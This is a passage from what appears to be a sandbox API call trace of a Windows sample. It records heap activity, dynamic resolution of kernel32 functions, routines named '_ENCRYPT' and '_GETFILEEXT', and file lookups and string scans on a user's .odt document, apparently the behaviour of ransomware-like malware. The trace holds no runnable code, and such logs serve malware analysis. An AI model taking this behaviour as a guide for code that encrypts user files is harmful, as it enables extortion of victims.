| out: hHeap=0x8a0000) returned 1 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.969] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0177.969] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0177.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0177.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0177.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.970] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0177.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.971] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0177.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9fa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0177.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.972] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0177.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.972] CloseHandle (hObject=0x120) returned 1 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.973] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0177.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0177.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.974] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.974] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0177.974] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.974] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0177.974] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.974] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0177.974] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0177.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0177.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.975] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0177.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.975] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.975] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e07ddb0, ftCreationTime.dwHighDateTime=0x1d5e195, ftLastAccessTime.dwLowDateTime=0x9abbf600, ftLastAccessTime.dwHighDateTime=0x1d5de7f, ftLastWriteTime.dwLowDateTime=0x9abbf600, ftLastWriteTime.dwHighDateTime=0x1d5de7f, nFileSizeHigh=0x0, nFileSizeLow=0x58fc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="GvoASfHILqm4y.odt", cAlternateFileName="GVOASF~1.ODT")) returned 0x90add8 [0177.976] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.976] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.977] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e07ddb0, ftCreationTime.dwHighDateTime=0x1d5e195, ftLastAccessTime.dwLowDateTime=0x9abbf600, ftLastAccessTime.dwHighDateTime=0x1d5de7f, ftLastWriteTime.dwLowDateTime=0x9abbf600, ftLastWriteTime.dwHighDateTime=0x1d5de7f, nFileSizeHigh=0x0, nFileSizeLow=0x58fc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="GvoASfHILqm4y.odt", cAlternateFileName="GVOASF~1.ODT")) returned 0x90add8 [0177.977] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.977] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, 